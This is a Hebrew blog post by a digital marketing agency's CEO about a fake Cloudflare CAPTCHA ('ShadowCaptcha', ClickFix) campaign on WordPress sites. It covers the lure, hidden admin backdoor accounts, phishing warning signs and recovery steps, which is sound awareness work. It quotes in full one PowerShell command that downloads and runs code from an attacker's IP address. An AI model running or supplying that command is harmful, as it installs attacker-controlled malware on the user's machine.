עשהאל דיגיטל

כשאימות Cloudflare הפך לדלת כניסה לתוקפים: סיפור אמיתי של פריצה שהתחילה בקליק תמים

5 במאי 2026

כשאימות Cloudflare הפך לדלת כניסה לתוקפים: סיפור אמיתי של פריצה שהתחילה בקליק תמים

כשאימות Cloudflare הפך לדלת כניסה לתוקפים: סיפור אמיתי של פריצה שהתחילה בקליק תמים: עמוד מידע מקצועי של עשהאל דיגיטל עם דגשים מעשיים לקידום, שיווק דיגיטלי וצמיח

שבוע שעבר חשבנו שזה מקרה בודד. אתמול בבוקר גילינו שזו מגפה. כשיהודה הגיע אליי ביום חמישי הקודם, אמרנו: "עוד לקוח שנדבק בוירוס, נטפל בזה ונמשיך הלאה." אבל הבוקר, כשבדקנו את כלל אתרי הלקוחות שלנו, הבנתי שזה לא תקלה חמודה של משרד אחד. זה דפוס התקפה מתוחכם שפגע בעשרות אתרים ברחבי העולם – ואנחנו היינו בתוכו.

האירוע הזה נקרא ShadowCaptcha, והוא קמפיין פשע סייבר עולמי שזוהה על ידי הרשות הממשלתית הישראלית לסייבר באוגוסט 2025. מאז, מעל 100 אתרי WordPress נפרצו וממשיכים לשמש כנקודות הפצה של תוכנות זדוניות: כופרות, גנבי מידע, ומכרים מטבעות. אני רוצה לספר לכם בדיוק מה קרה, איך זה עובד, ואיך תזהו את זה לפני שיהיה מאוחר מדי.

כשמישהו נכנס לאחד האתרים הנגועים, הוא רואה מסך שנראה אמיתי לגמרי. תיבת סימון קטנה ליד המילים "אני לא רובוט" , הלוגו של Cloudflare מלמטה, והכל נראה רשמי, מרגיע, ומוכר. זה בדיוק מה שהתוקפים רצו: שתסמכו על המותג שאתם מכירים.

איךנראית הפריצה

אבל אז מופיע משהו שאף אימות אמיתי לא יבקש ממך לעשות. המסך מבקש ממך ללחוץ על Win + R (פותח תיבת "הרץ" ב-Windows), ללחוץ על Ctrl + V (מדביק משהו שכבר הועתק אוטומטית עבורך ברקע), וללחוץ על OK.

המשך הפריצה

מה שבאמת קורה מאחורי הקלעים הוא שברגע שלחצתם על Ctrl+V, המערכת מדביקה את הפקודה הזו: powershell -c iex(irm 91.92.240.219 -UseBasicParsing). זה לא "אימות אנושיות". זו פקודה שמורידה ומריצה קוד זדוני ישירות מהשרת של התוקף.

כשהפקודה רצה, לתוקף יש עכשיו גישה מלאה למחשב שלכם. זה לא סתם וירוס שמאט את המחשב. זו דלת כניסה פתוחה שמאפשרת לתוקף לגשת לכל הקבצים – מסמכים, תמונות, קבצי עבודה, הכל. הוא יכול לגנוב סיסמאות שמורות מהדפדפן, ממנהלי סיסמאות, מחיבורים פתוחים, ולפעול מרחוק – להתקין תוכנות, להעביר כסף, לשלוח מיילים בשמכם. במילים פשוטות: הוא יכול לעשות כל מה שאתם יכולים לעשות על המחשב, בלי שתדעו על זה.

אחרי שהבנו שמדובר בדפוס רחב, בדקתי את ממשק הניהול (Admin Panel) של אחד האתרים הנגועים, וראיתי שבמערכת היה רשום משתמש אחד, אבל בפועל היו שלושה. שני משתמשים מוסתרים עם הרשאות מלאות – וזו הייתה הדלת האחורית (Backdoor) של התוקפים. זה אומר שגם אם תנקו את האתר, התוקפים יכלו לחזור דרך המשתמשים החבויים האלה.

עמוד משתמשים

ברגע שזיהינו את הדפוס, פתחתי טיקט תמיכה בשרת האחסון. אבל לא כל נציג תמיכה יודע לטפל בפריצה – צריך מישהו מנוסה. כתבנו בטיקט: "שלום, האתר נפרץ. כשנכנסים לדומיין מופיע עמוד התחזות שנראה כמו אימות Cloudflare, ובו הנחיה למשתמש לבצע Win+R ואז Ctrl+V ולהריץ פקודת PowerShell זדונית. מצורפים צילומי מסך של עמוד ההתחזות. בנוסף, במערכת המשתמשים אנחנו רואים רק משתמש אחד, אבל בפועל קיימים 3 משתמשים – כלומר יש 2 משתמשים מוסתרים/לא מוצגים לי. נא לבדוק ולנקות: משתמשים חשודים, הרשאות, קבצים זדוניים, cron/jobs, וכניסות חריגות."

8 כללים שיעזרו לכם לזהות פישינג לפני שתקליקו

אנחנו לא רוצים שזה יקרה לכם. אז הנה 8 כללים פשוטים שיעזרו לכם לזהות התחזות/פישינג לפני שתקליקו:

  1. כתובת השולח או הדומיין
    שימו לב לכתובת המייל או לדומיין של האתר. אם קיבלתם מייל מ-"Apple" אבל הדומיין הוא apple-security-verify.net במקום apple.com – זה לא Apple.
  2. בדקו לאן הקישור באמת מוביל
    עברו עם העכבר על הכפתור או הקישור בלי ללחוץ. אם הכתובת מוזרה או לא קשורה לספק – זה חשוד.
  3. בקשות למידע רגיש
    שירות לגיטימי לא יבקש ממכם להתחבר או לעדכן פרטים דרך מייל. תמיד היכנסו ישירות לאתר.
  4. פנייה כללית
    אם הפנייה מתחילה ב"לקוח יקר" במקום השם שלכם – זה דגל אדום.
  5. קבצים מצורפים חשודים
    חשבונית, חבילה, או קובץ שלא ציפיתם לו – אל תפתחו.
  6. עיצוב לא מקצועי
    שגיאות כתיב, ניסוח מוזר, או עיצוב "חובבני" – זו לא חברה רצינית.
  7. שפה מתורגמת
    עברית שנראית כמו תרגום של Google – חשדו.
  8. לחץ וזמן (Urgency)
    "פעלו עכשיו אחרת החשבון ייחסם!" – זו המלכודת הקלאסית.

הכלל החשוב ביותר: אם מבקשים ממכם להריץ משהו במחשב (Win+R, PowerShell, CMD) – זו לא אימות. זו השתלטות.

מה צריך לעשות אם בכל זאת הרצתם את הפעולה במחשב?

אם כבר ביצעתם את השלבים (Win+R, Ctrl+V, OK), פעלו מיד. נתקו את המחשב מהאינטרנט (Wi-Fi וכבל רשת), סגרו את כל הדפדפנים והתוכנות, הריצו סריקת אנטי-וירוס מלאה (Windows Defender או אנטי-וירוס מקצועי), שנו סיסמאות ממכשיר אחר (לא מהמחשב הנגוע), והתקשרו למומחה סייבר או IT. אל תנסו לנקות לבד. אל תתעלמו ("אולי זה בסדר"), אל תמשיכו לעבוד על המחשב, ואל תחכו "לראות מה קורה".

מה אמרו באיגוד האינטרנט הארצי?

אירוע הפריצה הזה הוא חלק מקמפיין בשם ShadowCaptcha, שזוהה על ידי הרשות הממשלתית הישראלית לסייבר באוגוסט 2025. מעל 100 אתרי WordPress נפרצו ומשמשים להפצת תוכנות זדוניות. מדינות שהושפעו: ישראל, ארה"ב, אירופה, אסיה – זה בעיה עולמית. 

סוגי תוכנות זדוניות: כופר, גנבי מידע, קריית קריפטו. המתקפה משתמשת בטכניקת ClickFix – מניפולציה פסיכולוגית שגורמת למשתמשים לעשות את העבודה המלוכלכת של התוקפים בידיים שלהם.

למה זה עובד כל כך טוב? 

התוקפים לא פרצו את חומת האש שלכם. הם פרצו את המוח שלכם. זה מה שקורה כשאתם רואים את המסך הזה: אתם רואים את הלוגו של Cloudflare (או Google) ומרגישים בטוחים. "אימות אבטחה" נשמע רשמי ומוגן. "רק תסמנו V ותמשיכו" – מה יכול להיות? "המערכת מאמתת אותך, אל תעצור את התהליך!" והנה התוצאה: אתם עושים בדיוק מה שהתוקף רוצה – ובידיים שלכם.

אחרי השבוע הזה, שלושה דברים ברורים לנו. ראשית, אין משהו כזה "זה לא יקרה לי". זה קרה ללקוחות שלנו ואפילו לנו. זה קרה למאות אתרים ברחבי העולם. זה יכול לקרות לכם. שנית, ההגנה הכי טובה היא מודעות. אנטי-וירוס זה חשוב, אבל המוח שלכם הוא קו ההגנה הראשון. אם אתם יודעים לזהות את הסימנים – אתם כבר 90% מוגנים. שלישית, אם זה נראה מוזר – זה כנראה מוזר. אף שירות אמיתי לא יבקש ממכם להריץ פקודות במחשב. Win+R? PowerShell? CMD? זו לא אימות. זו התקפה.

עשהאל דרייר – מנכ״ל עשהאל דיגיטל
על המחבר

עשהאל דרייר

מנכ״ל עשהאל דיגיטל · יזם דיגיטלי · מנחה הפודקאסט "לשווק ולמנכ"ל כמו עשהאל"

למעלה מ-15 שנות ניסיון בקידום אורגני, GEO, AI ושיווק דיגיטלי. ליווה מאות מותגים – מסטארטאפים ועד בנקים – לצמיחה דיגיטלית מוכחת. מרצה, מחבר ומנחה פודקאסט מוביל בתחום השיווק.

שיאי קידום מוכחים 90+ פרקי פודקאסט מנטור למנכ"לים
פגישת אסטרטגיה חינם 077-231-6741 הפודקאסט שלי לינקדאין